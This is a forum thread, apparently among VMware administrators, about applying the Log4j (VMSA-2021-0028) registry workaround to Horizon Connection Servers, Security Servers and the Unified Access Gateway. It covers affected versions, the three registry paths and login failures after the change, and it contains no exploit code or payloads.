There is nothing mentioned about the above product, does this product also need a workaround for the vulnerabilty ?
Hey, hope you are doing well.
Wasn't Horizon Security Server replaced with Unified Access Gateway appliance?
I'm fine thanks, you are correct but we are middle in the process of migration. And in version 7.0 there is a specific security role.
Hi, please go here https://www.vmware.com/security/advisories/VMSA-2021-0028.html for the latest information on this issue
Advisory doesn't specify if Security Servers will need the same patches as the Connection Servers. Anyone know of any additional info regarding the Security Servers?
If you look in the registry as the workaround you see only the tunnel key adjust this one accordingly
I reviewed the workaround information which guided me to KB87073 for the connection server. I stopped the connection service and performed the three registry changes.
HKLM\Software\VMware, Inc.\VMware\VDM\plugins\wsnm\MessageBusService\Params\JVMOptions
HKLM\Software\VMware, Inc.\VMware VDM\plugins\wsnm\TomcatService\Params\JVMOptions
HKLM\Software\VMware, Inc.\VMware VDM\plugins\wsnm\TunnelService\Params\JVMOptions
Each with appending a single space character followed by this text: -Dlog4j2.formatMsgNoLookups=true
After doing so with a restart of the service the web portal no longer was accessible along with the admin login. After a restart the same experience. I backed out the three changes and the portal and admin changes became available again a short time after the restart.
Analysis:
Horizon 8 versions 2111, 2106, 2103, 2012, 2006
Horizon 7 versions 7.13.1, 7.13.0, 7.12.0, 7.10.3
So we have to upgrade to 7.10.3 and then apply the workaround fix with registry
The Unified Access Gateway will not help you in first place because it will forward all requests to the internal veeam connection server and this one will execute and download the payloads.
With the help if vRI we found the queries and have encoded the payload. We have luck because the code only works on a linux and not windows server because they call bash and sh as the interpreter. We have curl and wget on windows on a regular bases 😞
We where scanned first on 12/11 in the morning hours and patched on 12/12 in the evening. A couple of tries are recorded in that period.
Regards,
Joerg
This is where you can find the latest updates
VMware Security Solutions https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Sorry to late. I havent seen the UAG listet yesterday... and we are scanned and most likely infected earlier. The UAG contains wget and curl.
The Listing isnt exactly right and showing "21.x, 20.x, 3.x" for the UAG. The workaround is clearly only for 2009 and up. Its not for 3.5.x and there is a big warning.
Regards,
Joerg
edit: managed to recover with the proper settings, Horizon runs again.
changing the JvmOptions regkeys messed up our Connection server and now nobody can log in!
HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm\MessageBusService\Params\JvmOptions
HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm\TomcatService\Params\JvmOptions
HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VDM\plugins\wsnm\TunnelService\Params\JvmOptions
thanks!